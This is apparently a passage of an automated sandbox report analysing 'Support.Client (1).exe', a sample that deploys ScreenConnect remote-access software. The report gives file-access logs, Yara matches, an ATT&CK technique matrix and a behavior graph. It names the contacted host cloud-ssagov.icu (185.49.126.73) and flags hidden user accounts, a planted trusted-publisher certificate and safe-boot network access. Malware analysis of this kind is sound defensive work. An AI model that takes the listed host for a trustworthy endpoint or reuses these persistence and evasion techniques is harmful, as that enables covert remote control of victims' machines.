                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeCode function: 11_2_04FDD498 CreateNamedPipeW,11_2_04FDD498
                  Source: C:\Users\user\Desktop\Support.Client (1).exeCode function: 0_2_00611806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00611806
                  Source: C:\Users\user\Desktop\Support.Client (1).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\Support.Client (1).exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: Yara matchFile source: 9.0.ScreenConnect.WindowsClient.exe.f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000000.1948916428.00000000000F2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2526431199.000002CADA736000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1968054123.000000000246F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 6996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7480, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 7516, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe, type: DROPPED
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  21
                  Disable or Modify Tools
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts11
                  Native API
                  1
                  DLL Search Order Hijacking
                  1
                  DLL Search Order Hijacking
                  1
                  Obfuscated Files or Information
                  LSASS Memory1
                  File and Directory Discovery
                  Remote Desktop ProtocolData from Removable Media21
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts12
                  Command and Scripting Interpreter
                  2
                  Windows Service
                  2
                  Windows Service
                  1
                  Install Root Certificate
                  Security Account Manager65
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  Scheduled Task/Job
                  1
                  Scheduled Task/Job
                  13
                  Process Injection
                  1
                  Timestomp
                  NTDS71
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Bootkit
                  1
                  Scheduled Task/Job
                  1
                  DLL Side-Loading
                  LSA Secrets2
                  Process Discovery
                  SSHKeylogging3
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Search Order Hijacking
                  Cached Domain Credentials71
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                  Masquerading
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Modify Registry
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt71
                  Virtualization/Sandbox Evasion
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron13
                  Process Injection
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Hidden Users
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                  Bootkit
                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1555317 Sample: Support.Client (1).exe Startdate: 13/11/2024 Architecture: WINDOWS Score: 54 48 fp2e7a.wpc.phicdn.net 2->48 50 fp2e7a.wpc.2be4.phicdn.net 2->50 52 3 other IPs or domains 2->52 58 .NET source code references suspicious native API functions 2->58 60 Detected potential unwanted application 2->60 62 Contains functionality to hide user accounts 2->62 64 AI detected suspicious sample 2->64 9 ScreenConnect.ClientService.exe 2->9         started        12 Support.Client (1).exe 2 2->12         started        14 svchost.exe 8 2->14         started        16 svchost.exe 1 1 2->16         started        signatures3 process4 dnsIp5 74 Reads the Security eventlog 9->74 76 Reads the System eventlog 9->76 19 ScreenConnect.WindowsClient.exe 9->19         started        22 ScreenConnect.WindowsClient.exe 9->22         started        24 dfsvc.exe 134 110 12->24         started        28 WerFault.exe 21 16 12->28         started        30 WerFault.exe 2 14->30         started        46 127.0.0.1 unknown unknown 16->46 signatures6 process7 dnsIp8 66 Creates files in the system32 config directory 19->66 68 Contains functionality to hide user accounts 19->68 54 cloud-ssagov.icu 185.49.126.73, 443, 49731, 49735 EDGEtaGCIComGB United Kingdom 24->54 38 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 24->38 dropped 40 C:\Users\...\ScreenConnect.WindowsClient.exe, PE32 24->40 dropped 42 ScreenConnect.WindowsBackstageShell.exe, PE32 24->42 dropped 44 13 other files (none is malicious) 24->44 dropped 32 ScreenConnect.WindowsClient.exe 19 9 24->32         started        file9 signatures10 process11 signatures12 56 Contains functionality to hide user accounts 32->56 35 ScreenConnect.ClientService.exe 32->35         started        process13 signatures14 70 Contains functionality to hide user accounts 35->70 72 Enables network access during safeboot for specific services 35->72

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Client.dll0%ReversingLabs
